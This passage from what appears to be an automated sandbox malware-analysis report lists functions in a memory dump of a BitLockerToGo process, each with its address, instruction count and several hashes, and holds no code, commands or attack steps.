                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 8e0cca39ff84fd151555c3515fd608dd66d946058cc07cd03d6a9ca66c6d7bf4
                                                                                                                                                                                                              • Instruction ID: 0b75c641ef86875913c7a4602837477fd66e06e7b881d18e1bf74f4f6d377190
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8e0cca39ff84fd151555c3515fd608dd66d946058cc07cd03d6a9ca66c6d7bf4
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9C719AB2A083A047D32C8F39D821377BBE29FE7301F19896ED9C65B395D6398805C746
                                                                                                                                                                                                              Function 0042FB10 Relevance: .3, Instructions: 262COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 061b739078cc944f6446272cb03cb648cddea56f82afbd1ec2b5e27c8e88d9a3
                                                                                                                                                                                                              • Instruction ID: 00cda835a3a8aeb8ca76c1c513f600a6db5b22fd1286c69882b03dc57e62e5c7
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 061b739078cc944f6446272cb03cb648cddea56f82afbd1ec2b5e27c8e88d9a3
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 43816B33B596A047D328893D5C61266AE934FD2334BAEC77ED9F1C73E0D56888064349
                                                                                                                                                                                                              Function 00431600 Relevance: .2, Instructions: 245COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: d4807037297a7e3104e2ae3dbc675ba34f87146a20a88a7aff381104f722076d
                                                                                                                                                                                                              • Instruction ID: db08bdad15a63e4df9f314543d4af99eb2d912985351c27f86e3b3c4355c91b9
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d4807037297a7e3104e2ae3dbc675ba34f87146a20a88a7aff381104f722076d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2E711737B69A900BD32C997C4C522A679834BDB330F2D977FA6B1873F1D96C48014359
                                                                                                                                                                                                              Function 0041CC60 Relevance: .2, Instructions: 230COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 3874e048970d52e5b543a5f06efacf9fa865be40d470309b55445cd8be651e1b
                                                                                                                                                                                                              • Instruction ID: 0a1689103dabd55f27f2e03787a13a7b13e81383c3a10f321d9325b0050b6a6c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3874e048970d52e5b543a5f06efacf9fa865be40d470309b55445cd8be651e1b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: DD711933B89A904BE3288A3C4C513AA6E934BD7330F2DC77ED9B5873D5D5694C528349
                                                                                                                                                                                                              Function 0042E348 Relevance: .2, Instructions: 210COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: ecc22dd6af61081940a3d2dd8ac2a609c6fbf4c81f4c22bb7c9dd03bae6ff5c2
                                                                                                                                                                                                              • Instruction ID: 6f54ec1628887ebd124369c7e01a5fce9683b9cdbba84facb4991cc2a76e656b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ecc22dd6af61081940a3d2dd8ac2a609c6fbf4c81f4c22bb7c9dd03bae6ff5c2
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 49811776605B408FC314DF38D4912A6BBF2EFD9304F19C96DD5DA8B361EA38A445CB06
                                                                                                                                                                                                              Function 0042E85A Relevance: .2, Instructions: 209COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 1b84af9449327720d47bc5a6d1181cb27be8339f8beb1a7ba5d76c69873097f5
                                                                                                                                                                                                              • Instruction ID: 71dcd362bb1b85959b9f0527bcc8ea627fe0c4010d3ec26d4460f76470eb0627
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1b84af9449327720d47bc5a6d1181cb27be8339f8beb1a7ba5d76c69873097f5
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4D81D476A04B408FC314DF39D491296BBE2EF9A304F18C96DD5DA8B761EA38E445CB06
                                                                                                                                                                                                              Function 0043AE90 Relevance: .2, Instructions: 209COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 491e0b4e746b6ae2b26135feb799896fdafc5d05ae4958b8f668b56a95cdd03d
                                                                                                                                                                                                              • Instruction ID: b7783948d08f39a67ea1c3b961408871100e1d4f435334161cb92700b073aafb
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 491e0b4e746b6ae2b26135feb799896fdafc5d05ae4958b8f668b56a95cdd03d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6671A47164C3918FC715CF28C49062EBBE2AFC9314F18866EE4E58B352D739D846CB96
                                                                                                                                                                                                              Function 004247A4 Relevance: .2, Instructions: 200COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 69b4de0d890f87869950805b59b5e99604ead4b317454bd70b553ddd3ce74cca
                                                                                                                                                                                                              • Instruction ID: 05809e16915fed128d931126e19dbd27adc8a27fec7a90456d3853c1e5d654cb
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 69b4de0d890f87869950805b59b5e99604ead4b317454bd70b553ddd3ce74cca
                                                                                                                                                                                                              • Instruction Fuzzy Hash: DD517A76B002628FDB20CF64D8412EBF7A1EF96310F54862BC59597381E338E945DBD5
                                                                                                                                                                                                              Function 0041AAD8 Relevance: .2, Instructions: 197COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: cac67eff1fc8808891f639f2180ed2aea8cc2f753968fdf17d4751e1f7ef00e7
                                                                                                                                                                                                              • Instruction ID: 3b41f08a3a3615997a235241210a21f9c2c00a8ca0b6a160b4a4c4c500019e3c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: cac67eff1fc8808891f639f2180ed2aea8cc2f753968fdf17d4751e1f7ef00e7
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6D5177345127018BC7248F24C8A2773B7B2FF96320B19815DD4860F7A1F739E8A1CB8A
                                                                                                                                                                                                              Function 0041A8EF Relevance: .2, Instructions: 189COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 88c03fc451623f9268d23274198f04e43c364dd01cb0c4d34e9fd8ada386ab99
                                                                                                                                                                                                              • Instruction ID: a7d43d3a713622c042a2e41d4a48fea9871682f3be10858a8f07de32be899553
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 88c03fc451623f9268d23274198f04e43c364dd01cb0c4d34e9fd8ada386ab99
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E25115B01117028BC724CF24C4A17B3B3B1FF56361B29965DD4860B7A1E338E8A1CB9A
                                                                                                                                                                                                              Function 00436160 Relevance: .2, Instructions: 189COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: bdd1d7248006fac35233d4c2f05cd9073d205649cf1ee8f499dc35e0785e639b
                                                                                                                                                                                                              • Instruction ID: b0a8cd444d38c64fca3fda87be0bcf235bbc19e32bd7f61d0494594084362add
                                                                                                                                                                                                              • Opcode Fuzzy Hash: bdd1d7248006fac35233d4c2f05cd9073d205649cf1ee8f499dc35e0785e639b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A6517EB15083549FE314DF29D89435BBBE1BBC8318F054A2EE4E583390E379D6088F86
                                                                                                                                                                                                              Function 0041CFB0 Relevance: .2, Instructions: 188COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: d82c1330955702a364d963265f3286a315896802f7bfb0e17870ce11e6f90af1
                                                                                                                                                                                                              • Instruction ID: 959a512eeab541835f96cd7f6e01a658626a50f912d0bdf03c47c42ea7ec9c4e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d82c1330955702a364d963265f3286a315896802f7bfb0e17870ce11e6f90af1
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E1513633F59A904BD728893C4C502E66E930BE7334B3DC76AE5B1C73E4D5698C528349
                                                                                                                                                                                                              Function 004198A0 Relevance: .2, Instructions: 179COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: cf7af7ae163016bf3a5d854131f20c3c600ee3933dded72a1a5d137a4ac266c8
                                                                                                                                                                                                              • Instruction ID: d25d694360d149a90b06bdb1e0254df6f0428fd2c3658b290a7790044fdb4d74
                                                                                                                                                                                                              • Opcode Fuzzy Hash: cf7af7ae163016bf3a5d854131f20c3c600ee3933dded72a1a5d137a4ac266c8
                                                                                                                                                                                                              • Instruction Fuzzy Hash: EE5136376599C047D3288A3C4C612AA6A930FD3230B3DC7AFD5B6873E5D9694C464359
                                                                                                                                                                                                              Function 0042ACBD Relevance: .2, Instructions: 172COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: dd67305bd78394fc8873c5d0809a5da29ccea30ea79d8d7a0a3ed3731dd7d51c
                                                                                                                                                                                                              • Instruction ID: 9a1f03d4dd20f9fad3c2190f3cfc6065b17ba6dda419f6486c59b63e61019088
                                                                                                                                                                                                              • Opcode Fuzzy Hash: dd67305bd78394fc8873c5d0809a5da29ccea30ea79d8d7a0a3ed3731dd7d51c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A35147756183A09BE3358F24DC90BABBBE2AFD3301F14896DE8C96B381D6394805C757
                                                                                                                                                                                                              Function 0041A541 Relevance: .2, Instructions: 164COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: d65df40cd549245263d1dad52dba55f689dea4e02e383ea649d3bbebee6b2713
                                                                                                                                                                                                              • Instruction ID: f086d3d41bd71bdc03d38f4d3bd9482c1b42cc541d618f56ef71cddd0e0e0261
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d65df40cd549245263d1dad52dba55f689dea4e02e383ea649d3bbebee6b2713
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9A514432605B818BD325CF29C8906B3FBE29FA6300B28886EC0D687751E738E55A8755
                                                                                                                                                                                                              Function 004029D0 Relevance: .2, Instructions: 163COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: d4d0c9d6ab8b9dc3315b8601ac2963c6970f8dbeb2a979f22ab98ace889d458a
                                                                                                                                                                                                              • Instruction ID: 546ab2e6fdffafe73fe0a8b860a77a3a5cd9bd8a30b912bf61ebe424895ce4ca
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d4d0c9d6ab8b9dc3315b8601ac2963c6970f8dbeb2a979f22ab98ace889d458a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6E41DB327081564BC7288E3D9E9417AFBE29FC5308B1D877EE889E73C2D578D9019798
                                                                                                                                                                                                              Function 0040DFF5 Relevance: .2, Instructions: 155COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: e45f20214bf21905183cb1140874c278e2cd046cde042ad1ea360a6847ddd4ff
                                                                                                                                                                                                              • Instruction ID: 61196fbe4793393b89ebfd6a1a06c486cb46a45a7e230e91c15214dde0b2d2aa
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e45f20214bf21905183cb1140874c278e2cd046cde042ad1ea360a6847ddd4ff
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2D6154B0601300CFE7209F12C991B127BB2FFA6314F169998D6454F7A6D3BAD859CF84
                                                                                                                                                                                                              Function 0042C477 Relevance: .1, Instructions: 148COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 12e1380db867051d63d01232387ceadab44b98608807bbbf439c5b7756c3b80e
                                                                                                                                                                                                              • Instruction ID: 88033d5e7ac54c645a990e866b06058151a6dc4e1f8aadf696473e0c042e3f02
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 12e1380db867051d63d01232387ceadab44b98608807bbbf439c5b7756c3b80e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6D41E27150C3A187CB3A8B3994607FBB6E0AF9B700F54596DD4CA9B290E7388445878A
                                                                                                                                                                                                              Function 0042631D Relevance: .1, Instructions: 142COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 109e9bb4079605bc038373af85dc7c3e2aaf762560e35345aa76a51534d7030e
                                                                                                                                                                                                              • Instruction ID: 04afeecb48b1b214a768d3948dde911867042464f14e443e4d2bba12f8852c97
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 109e9bb4079605bc038373af85dc7c3e2aaf762560e35345aa76a51534d7030e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: BF5146B5608301CFE3209F64E84672BB7E1FBC5308F06447CE589972A2EB759915DB8A
                                                                                                                                                                                                              Function 0040E2A0 Relevance: .1, Instructions: 141COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 523eadca2f8f90cb8c999ed215c6d81f5567a30a813d9c5a9f728960006adf37
                                                                                                                                                                                                              • Instruction ID: afc2794f92c05994b3311c420dd19fe8b7e392224432c73a25457092a267678c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 523eadca2f8f90cb8c999ed215c6d81f5567a30a813d9c5a9f728960006adf37
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C6318C782081009BD7288F2ACC81E363766EB5A314B54497DFE52E73E2D7349C62DA9C
                                                                                                                                                                                                              Function 004299F0 Relevance: .1, Instructions: 119COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 6fe1dffe9c7bb9e5a547c9ad92804e987a1c61166941838442cc42d42e2cb3cd
                                                                                                                                                                                                              • Instruction ID: 46e7a14e06699c740de4b2d8f0aa06f55bf302cd9dd4a660e20626605f8218f3
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6fe1dffe9c7bb9e5a547c9ad92804e987a1c61166941838442cc42d42e2cb3cd
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 29313973E20A340BD7088D2DAC1126A75825BD5265F9E8379DDBA9F3C2DA34DC1692D0
                                                                                                                                                                                                              Function 00421E04 Relevance: .1, Instructions: 115COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: fb81817b57c8e212fc39ba569fbfa121d339b614c1316ee25c8e6978c0bb8225
                                                                                                                                                                                                              • Instruction ID: d2e122fcdcbdefefd050c465a623d643b79a35a2d75517d1cef25498a6fcd50c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: fb81817b57c8e212fc39ba569fbfa121d339b614c1316ee25c8e6978c0bb8225
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 27410232A046308BD328CF29DC4176BB392BB95314F8A863CDDA59B395D7799846C7C1
                                                                                                                                                                                                              Function 0043B26F Relevance: .1, Instructions: 109COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: e49c804ef2a5b017a2d39959f3e47572316032b05eecb338b3061f6419b9c818
                                                                                                                                                                                                              • Instruction ID: 57d3ad20d75704d68cc86176bcf351aebe7f6d28dc7e58fc948e8610e15cbfd7
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e49c804ef2a5b017a2d39959f3e47572316032b05eecb338b3061f6419b9c818
                                                                                                                                                                                                              • Instruction Fuzzy Hash: BB3124B6E243005BE304CF79EC4222B76A3EBC5704F08D43EEC54A7255EB7A890A474A
                                                                                                                                                                                                              Function 00419FDF Relevance: .1, Instructions: 104COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 528efb0fd5bccd23b0dba660e7171ccaa7e16db31effe06352f8b6ebcb26164f
                                                                                                                                                                                                              • Instruction ID: aff035c6339e2d7a90ae2a3a5b4b83dc219d0afaa5f2daa2453facd1ed0ab710
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 528efb0fd5bccd23b0dba660e7171ccaa7e16db31effe06352f8b6ebcb26164f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5131C032610B418BC728CF38CC92663BBF1AF86328B18992DD0D7D7691D338E54AC759
                                                                                                                                                                                                              Function 004205BC Relevance: .1, Instructions: 91COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: af399e730694a05470527855dc5e6ad9df6ab6c6e29d0f235fcfe056face4e4e
                                                                                                                                                                                                              • Instruction ID: ab51aa93e413debfba8e48ffa7466b019a51a2142e7b76fc8b74a77f7aeb7ece
                                                                                                                                                                                                              • Opcode Fuzzy Hash: af399e730694a05470527855dc5e6ad9df6ab6c6e29d0f235fcfe056face4e4e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7A212426B0C71847E70CED79EC242BBB6C28BD4314F08C53DA69A93385EC748A095285
                                                                                                                                                                                                              Function 0042A322 Relevance: .1, Instructions: 88COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
